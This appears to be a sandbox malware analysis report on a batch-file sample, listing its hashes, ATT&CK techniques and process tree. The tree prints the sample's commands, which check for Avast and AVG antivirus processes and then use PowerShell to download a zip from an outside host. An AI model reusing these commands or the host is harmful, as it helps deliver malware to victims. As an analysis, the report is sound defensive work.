6ef23d5f69695cd8c9381e416928ca10e33a0b927c451399ab439eb64007a5ec

General

Target

06112024_0119_new.bat
Size

44KB
MD5

0a8189409a127612b858f940e3410212
SHA1

44e4fd543179b18b9565c6ce4145ff61ab75e7f0
SHA256

6ef23d5f69695cd8c9381e416928ca10e33a0b927c451399ab439eb64007a5ec
SHA512

e4af985ebe31d0beae17999c893c7ad6824684caf863439f676a2dae9b2a6da74eddb41ca58b54aade9fb5ffabe93bd1a2db6ac21fe87f94b5d66c0a354b677d
SSDEEP

768:gTYcpQyuPmhDGEhtKC+5Vcc8xJWWAF/U61RPMrQqMgrrLFAvzUk+imrt0wLm2PoL:gTYcpQyuPmhDGEhtKC2Vc93WWApUkPMy

Score

8^/10

discovery execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exe

pid	Process
2852	powershell.exe
2616	powershell.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

Processes:

tasklist.exetasklist.exe

pid	Process
940	tasklist.exe
2728	tasklist.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid	Process
2852	powershell.exe
2616	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

tasklist.exetasklist.exepowershell.exepowershell.exe

description	pid	Process
Token: SeDebugPrivilege	940	tasklist.exe
Token: SeDebugPrivilege	2728	tasklist.exe
Token: SeDebugPrivilege	2852	powershell.exe
Token: SeDebugPrivilege	2616	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

cmd.exe

description	pid	Process	procid_target
PID 2524 wrote to memory of 940	2524	cmd.exe	30
PID 2524 wrote to memory of 940	2524	cmd.exe	30
PID 2524 wrote to memory of 940	2524	cmd.exe	30
PID 2524 wrote to memory of 788	2524	cmd.exe	31
PID 2524 wrote to memory of 788	2524	cmd.exe	31
PID 2524 wrote to memory of 788	2524	cmd.exe	31
PID 2524 wrote to memory of 2728	2524	cmd.exe	33
PID 2524 wrote to memory of 2728	2524	cmd.exe	33
PID 2524 wrote to memory of 2728	2524	cmd.exe	33
PID 2524 wrote to memory of 2716	2524	cmd.exe	34
PID 2524 wrote to memory of 2716	2524	cmd.exe	34
PID 2524 wrote to memory of 2716	2524	cmd.exe	34
PID 2524 wrote to memory of 2852	2524	cmd.exe	35
PID 2524 wrote to memory of 2852	2524	cmd.exe	35
PID 2524 wrote to memory of 2852	2524	cmd.exe	35
PID 2524 wrote to memory of 2616	2524	cmd.exe	36
PID 2524 wrote to memory of 2616	2524	cmd.exe	36
PID 2524 wrote to memory of 2616	2524	cmd.exe	36

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\06112024_0119_new.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2524
- C:\Windows\system32\tasklist.exe
  tasklist /FI "IMAGENAME eq AvastUI.exe"
  2⤵
  - Enumerates processes with tasklist
  - Suspicious use of AdjustPrivilegeToken
  PID:940
- C:\Windows\system32\find.exe
  find /i "AvastUI.exe"
  2⤵
  PID:788
- C:\Windows\system32\tasklist.exe
  tasklist /FI "IMAGENAME eq avgui.exe"
  2⤵
  - Enumerates processes with tasklist
  - Suspicious use of AdjustPrivilegeToken
  PID:2728
- C:\Windows\system32\find.exe
  find /i "avgui.exe"
  2⤵
  PID:2716
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kendychop.shop:9135/bab.zip' -OutFile 'C:\Users\Admin\Downloads\downloaded.zip' } catch { exit 1 }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2852
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kendychop.shop:9135/bab.zip' -OutFile 'C:\Users\Admin\Downloads\downloaded.zip' } catch { exit 1 }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2616

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Process Discovery

1

T1057

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\F46WG76FXCRFP4XAWE2S.temp

Filesize
7KB

MD5
995ee255b880014348fab2b3a67aefb3

SHA1
0ec507fae0f1e28471e1e59d4f320b78b6549b0e

SHA256
9a4ee7ff2a747d75b65b8936d7233814da77c903cac5471963639601bf04ba28

SHA512
a8978a30177c0efec7acabd7aa1e164c2b8edf262e92ea0fd8a3013540dd33d99c8a41a4ac5659a743fa56a6c5f1471ec47320e0542c63f843e0a18d490527e3

Download Submit
memory/2616-16-0x000000001B640000-0x000000001B922000-memory.dmp

Filesize
2.9MB

Download
memory/2616-17-0x0000000001E10000-0x0000000001E18000-memory.dmp

Filesize
32KB

Download
memory/2852-4-0x000007FEF57FE000-0x000007FEF57FF000-memory.dmp

Filesize
4KB

Download
memory/2852-5-0x000000001B870000-0x000000001BB52000-memory.dmp

Filesize
2.9MB

Download
memory/2852-6-0x0000000001F70000-0x0000000001F78000-memory.dmp

Filesize
32KB

Download
memory/2852-7-0x000007FEF5540000-0x000007FEF5EDD000-memory.dmp

Filesize
9.6MB

Download
memory/2852-8-0x000007FEF5540000-0x000007FEF5EDD000-memory.dmp

Filesize
9.6MB

Download
memory/2852-9-0x000007FEF5540000-0x000007FEF5EDD000-memory.dmp

Filesize
9.6MB

Download
memory/2852-10-0x000007FEF5540000-0x000007FEF5EDD000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads